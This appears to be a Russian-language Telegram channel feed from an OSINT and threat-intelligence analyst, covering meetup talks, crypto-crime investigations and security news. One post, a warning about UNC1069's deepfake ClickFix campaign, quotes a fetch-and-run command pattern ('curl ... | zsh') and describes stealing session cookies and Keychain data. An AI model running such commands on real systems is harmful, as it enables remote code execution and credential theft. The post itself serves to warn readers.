сelestial intelligence lab
1.06K subscribers
87 photos
4 videos
3 files
52 links
building cool things with cool people🕵️‍♂️
@celestial3301
Download Telegram
Спасибо всем, кто пришёл на встречу 2600 и сделал этот вечер таким, каким он получился 🙌

Да, в начале были небольшие технические недочёты - микрофон решил пожить своей жизнью, - но дальше всё пошло как надо. По вашим отзывам, атмосфера, доклад и живое обсуждение действительно зашли, а это самое главное.

Отдельное спасибо за вопросы, комментарии и разговоры после выступления - именно ради такого формата и существует 2600. Очень ценно видеть интерес, критику и разные точки зрения.

Надеюсь, всем понравилось и каждый унес с собой что-то полезное. Если есть мысли, идеи или фидбек - смело пишите в лс, буду рад обратной связи 💬
🔥84🤩3👍2
Forwarded from Хакер — Xakep.RU
Встреча читателей «Хакера» пройдет в Алматы 29 января

29 января 2026 года в 19:00 состоится встреча читателей «Хакера» в Алматы, приуроченная к разблокировке Xakep.ru на территории Казахстана. На офлайн встрече выступит главный редактор «Хакера», а также двое спикеров из хакерспейса Black Ice.

https://xakep.ru/2026/01/21/almaty-meetup-jan/
🔥8
Всем привет 👋
Я один из докладчиков на этой встрече.
Если вы не попали на мой доклад на 2600 - это хороший шанс наверстать и пообщаться вживую
👍74🌚1
Скорее всего по своему докладу напишу статью, так как главный редактор хакера сказал, что тема крутая)
🔥7🏆3
оказывается регистрация все таки требуется…
Forwarded from Чёрный Лёд
Вторым докладчиком на встрече выступит CelestialOSINT analyst и CTI analyst.

Доклад:
Кроссчейн-мосты между приватностью и атрибуцией: системный анализ криминального использования”.

Коротко о содержании:
• как работают кроссчейн-мосты и где они выдают следы;
• популярные маршруты типа Tron → BTTC → Polygon → CEX;
• типовые ошибки атакующих и реальные кейсы 2025 года.

📅 Когда: 29.01.2026
🕖
Время: 19:00
📍
Где: г. Алматы, Energo University
🔥5🍾32❤‍🔥1💋1
Увидимся через 2 дня)
7🍌1
Всем спасибо за то, что пришли. Было круто
Надеюсь, что доклад побудил вас вникнуть в тему криптовалютных расследований)
👏9🔥74🌭1
Набираю 6 студентов на OSINT-практику

Летом хочу собрать небольшую команду студентов, которые хотят нормально попробовать себя в аналитике и OSINT

Будем заниматься:
— сбором и анализом данных
— исследованием платформ
— построением графов связей
— подготовкой аналитических материалов
— участием в разработке OSINT-инструмента

Если вам это интересно, напишите в личные:
ФИО, вуз/курс и пару слов о себе (что уже пробовали делать или чему хотите научиться).

Возьму небольшую группу - до 6 человек, чтобы можно было нормально поработать с каждым
🔥8❤‍🔥41🤔1
🚨 Apple закрыли 0-day. Уже использовался в атаках.

CVE-2026-20700

Если у вас Mac / iPhone / iPad - нужно просто зайти и обновиться.

Пофикшено в:
• macOS Tahoe 26.3
• iOS 26.3
• iPadOS 26.3
• visionOS 26.3
• watchOS 26.3
• tvOS 26.3

Просой OPSEC:

1) Проверить свою версию
2) Установить обновление
3) Напомнить близким сделать то же самое)

Решил тут немного еще про Apple постить, так как в свое время мечтал у них работать)
9👀3❤‍🔥2
UNC1069: Deepfake-театр и терминальные эксплойты

Группировка перешла от стандартного фишинга к использованию AI-аватаров реальных CEO прямо на созвонах. Вы заходите на встречу (домен типа zoom-meeting[.]us), видите известного фаундера, слышите его голос, но видео «лагает» из-за якобы плохого соединения.

Вся схема заточена под вектор ClickFix.

Вместо того чтобы кидать подозрительный файл, вас просят «починить», вставив скрипт в терминал. Расчет на психологию: скопировать код кажется безопаснее, чем скачать exe-шник.

Исполнение моментальное. На macOS это классический curl -sL [URL] | zsh, на Windows прилетает mshta.

После ввода команды они не ищут сид-фразы. Они пылесосят активные сессии (Cookies). Это дает прямой вход на биржи (CEX), в админки и SaaS в обход 2FA. Заодно вытягивают Keychain и сессии Telegram (tdata), чтобы масштабировать атаку уже от вашего имени.

Кампания эксплуатирует старый миф о том, что macOS безопасна «из коробки». Если кто-то просит вставить команду в терминал, чтобы пофиксить микрофон - рубите связь. Даже если на экране ваш друг.


Более подробно об этой APT можно прочитать здесь:

https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
5🤯2
Речь про тот самый кейс, где DOJ изъяли 127 тысяч BTC, связанные с pig butchering схемами. Огромные суммы, десятки тысяч транзакций и целая сеть компаний вокруг. Но самое интересное не в цифрах, а в том, как это всё было устроено.

DOJ по сути разобрали не просто набор кошельков, а теневую финансовую систему. Когда смотришь на структуру Prince Group, это больше похоже на банковскую инфраструктуру, чем на скам-кошелёк. Mining-операции работали как отмывка ликвидности, Huione OTC были рельсами для движения средств, а Prince Bank выступал как точка выхода в фиат.

Pig butchering давно уже не «скам из телеги». Это индустрия. С траффикингом людей, колл-центрами, CRM, KPI и нормальной финансовой логистикой через ончейн. Деньги дробятся, гоняются по адресам, проходят через прокладки.

Я сел писать об этом после статьи Elliptic “Park: Prince and Huione’s role in a scam compound still operating amid crackdowns”. Она хорошо показывает, как такие структуры продолжают работать даже на фоне давления и арестов.

И на фоне этих миллиардов особенно тяжело смотреть недавнее интервью в Казахстане. Парень просто искал хорошо оплачиваемую работу и в итоге оказался в трудовом рабстве в Мьянме в составе scam compound. За всеми этими графами и миллиардами всегда стоят реальные люди.
5🔥2
Если всё это собрать в граф - получается вот такая картина.
И это ещё без мелких связей.

Кошельки уже кластеризированы - то есть объединены там, где есть признаки общего контроля.

И если честно, то масштаб э поражает.
Поэтому я впечатлён объёмом проделанной работы DOJ.

Я помню свой первый ончейн-трейсинг: тогда каждая транзакция казалась лабиринтом. Понять логику движения средств, увидеть связи, не утонуть в деталях - это было крайне сложно.

А когда смотришь на такие расследования, кажется, будто это всего лишь линии и точки на графе)
8
Prince group.pdf
2.8 MB
А вот и сам репорт от DOJ
5
Ладно, если не говорить о прошлом, а о нынешних трендах, то во Франции сейчас происходит что-то очень неприятное.

CEO Binance France Давид Пренсэ стал целью вчерашнего нападения. Около семи утра трое в масках ворвались в жилой дом, сначала ошиблись квартирой - искали именно его. Когда добрались до нужной двери, его и семьи дома не оказалось. Забрали два телефона и скрылись. Он и близкие не пострадали. Но сам факт показательный.

И это не единичный случай.

В январе 2025-го похитили Давида Баллана, сооснователя Ledger. Из собственного дома во Франции. Требовали €10 млн в крипте. Чтобы ускорить выплату, ему отрезали палец. История закончилась спасением после частичного перевода выкупа, но сам сигнал был максимально жёсткий.

Во Франции сейчас реально пиздец творится вокруг крипто-индустрии.
Это wrench attack в чистом виде когда вместо эксплойта используют физическое насилие.

Мы много говорим про OPSEC, про cold storage, про multisig, про разделение ролей, про air-gapped устройства. Но вся эта архитектура ломается, когда к тебе приходят домой. И это новая реальность для публичных фигур в крипте
6😈2
Это те преступления, при которых во Франции похищали криптовалюту с применением физического насилия за 2025-2026
6🤯2🍌1